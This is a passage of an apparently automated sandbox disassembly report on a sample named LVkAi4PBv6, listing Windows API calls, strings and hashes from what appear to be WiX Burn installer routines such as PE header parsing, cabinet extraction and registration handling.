                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 008A30B5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008A30C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 008A30CC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008A30D6
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(008CB6B8,00000000,00000001,008AB818,?,?,?,?,?,?,?,?,?,?,?,0088C025), ref: 008A3111
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 008A31C0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                                                                                                                                                                                                  • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2124981135-499589564
                                                                                                                                                                                                                                                                                                  • Opcode ID: 22733e0b17ca77e1436a47894306cc4b504fde919a8c27d6a454e1b0695a42c2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09f5f3740c18933044ea9fc87e2a35d541f5cdce09df57d15e5ac1b335e3ba85
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22733e0b17ca77e1436a47894306cc4b504fde919a8c27d6a454e1b0695a42c2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F419F31A01615ABEB249FA8C845FAEBBB8FF46710F114179F901EBB41DB75DE008B90
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008633C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 008610F6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861186
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 00861191
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0086119F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008611C2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00861175: GetLastError.KERNEL32(?,?,?,?,?,0086111A,cabinet.dll,00000009,?,?,00000000), ref: 008611D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,008AB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00861131
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                                                                                                                                                  • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3687706282-3151496603
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c305821e591ed8b3caf7e299a0e81ed3d5b0eb8021c567102a28fa0040cc687
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56a5e32266fcf0d1cd6c04024c810e328b9fbaccf5650fc671a113a21d8535c9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c305821e591ed8b3caf7e299a0e81ed3d5b0eb8021c567102a28fa0040cc687
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E121607190121CABEF109FA8DC49BDEBBB8FB0A714F554115EA10F7292D77099088BA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FEF4
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FF04
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0089FF0D
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(8007139F,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 0089FF23
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008CB5FC,008812CF,?,00000000,0000FDE9,?,008812CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008A001A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 0089FFC0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                                                                                                                                                  • API String ID: 296830338-59366893
                                                                                                                                                                                                                                                                                                  • Opcode ID: d48a4cf6309e109037f43a52f7fb9bed90decd3b3bb36fb05d51182479efd008
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a2ce312a7cd398923eb417996aecb2177a92efd58d1e09625ac8e17ffc7c3e1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d48a4cf6309e109037f43a52f7fb9bed90decd3b3bb36fb05d51182479efd008
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC416E71D01619ABEF259FA4D805FBEB7B8FB09711F140029FA01E6251EB349D40DBA1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder., xrefs: 0087A116
                                                                                                                                                                                                                                                                                                  • Failed to calculate working folder to ensure it exists., xrefs: 0087A0D8
                                                                                                                                                                                                                                                                                                  • Failed create working folder., xrefs: 0087A0EE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                                                                                                                                                  • API String ID: 3841436932-2072961686
                                                                                                                                                                                                                                                                                                  • Opcode ID: ff76e82eb85ab95dd55c708b4e2d14a2121a66b5b95d3c22791ffd0f2bda2d70
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7736e331225abcfe36d2e86d8afa600ba851b9db44efa304675be93cb647a9d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff76e82eb85ab95dd55c708b4e2d14a2121a66b5b95d3c22791ffd0f2bda2d70
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD012432900928FA9B279A49CC06C9EBB79FF81720B108251F804F6214EB35DE10A692
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002,00000000), ref: 008948F9
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002,00000000), ref: 00894900
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00894912
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f35cfff7b4db1996aaa3e34ff135e5f9590bf2f9eb768631212b6600b29e7a79
                                                                                                                                                                                                                                                                                                  • Instruction ID: 96189136a181cacfc2991c2129e305463955970a48e1ba2c1ff75dcdb6f07fe3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f35cfff7b4db1996aaa3e34ff135e5f9590bf2f9eb768631212b6600b29e7a79
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11E0B631410248AFDF11BF95DD09E493F69FF46791B084014F85A8A533DB35DD53CA80
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 994b5f5b723d0036611d9ab90d543634c9d4b14e690f026cc3f0b122f380585b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 020fb346a9f971b2454136aeb932a1dd6fd3b4ce206e7a267a08c7e76bce6517
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 994b5f5b723d0036611d9ab90d543634c9d4b14e690f026cc3f0b122f380585b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62C012321A420CAB8B006FF8EC1EC9A3BACBB296027048510B905C3521C738E0108B60

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                                                                                                                                                  • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                                                                                                                                                  • API String ID: 760788290-2956246334
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1b2420f4c4294cc1b3fa50242bb11fdeeaa3beeb5a606a8f72275362f4f43878
                                                                                                                                                                                                                                                                                                  • Instruction ID: e442ac44816c641c20307fbe0fa16788132935eea479cba0c6c356abe38acc30
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b2420f4c4294cc1b3fa50242bb11fdeeaa3beeb5a606a8f72275362f4f43878
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49E1D632E4463ABACF219664DC56EEEB6A5FB01710F120231FA21FA352DB65DD1097C1

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B502
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B550
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B556
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00864461,00000040,?,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B59E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,7774C3F0,00000000), ref: 0086B5A4
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B601
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B607
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B650
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B656
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B6C7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B6CD
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B716
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B71C
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B765
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B76B
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B7B7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B7BD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B810
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B872
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B8FC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B906
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,008808BC,?,?), ref: 00880D25
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880D2F
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,008808BC,?,?), ref: 00880D74
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880D7F
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,?,?,008808BC,?,?), ref: 00880DB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,008808BC,?,?), ref: 00880DC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008633C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008610DD,?,00000000), ref: 008633E8
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F40
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F4F
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F5E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00864F69
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to append %ls, xrefs: 00864E1C
                                                                                                                                                                                                                                                                                                  • burn.filehandle.attached, xrefs: 00864E17
                                                                                                                                                                                                                                                                                                  • %ls %ls, xrefs: 00864E55
                                                                                                                                                                                                                                                                                                  • D, xrefs: 00864EA9
                                                                                                                                                                                                                                                                                                  • Failed to wait for clean room process: %ls, xrefs: 00864F23
                                                                                                                                                                                                                                                                                                  • burn.filehandle.self, xrefs: 00864E45
                                                                                                                                                                                                                                                                                                  • -%ls="%ls", xrefs: 00864DE6
                                                                                                                                                                                                                                                                                                  • Failed to get path for current process., xrefs: 00864D83
                                                                                                                                                                                                                                                                                                  • Failed to allocate parameters for unelevated process., xrefs: 00864DFA
                                                                                                                                                                                                                                                                                                  • Failed to allocate full command-line., xrefs: 00864E8E
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00864EEA
                                                                                                                                                                                                                                                                                                  • Failed to cache to clean room., xrefs: 00864DC2
                                                                                                                                                                                                                                                                                                  • burn.clean.room, xrefs: 00864DDE
                                                                                                                                                                                                                                                                                                  • Failed to launch clean room process: %ls, xrefs: 00864EF7
                                                                                                                                                                                                                                                                                                  • Failed to append original command line., xrefs: 00864E69
                                                                                                                                                                                                                                                                                                  • "%ls" %ls, xrefs: 00864E7A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileModuleName
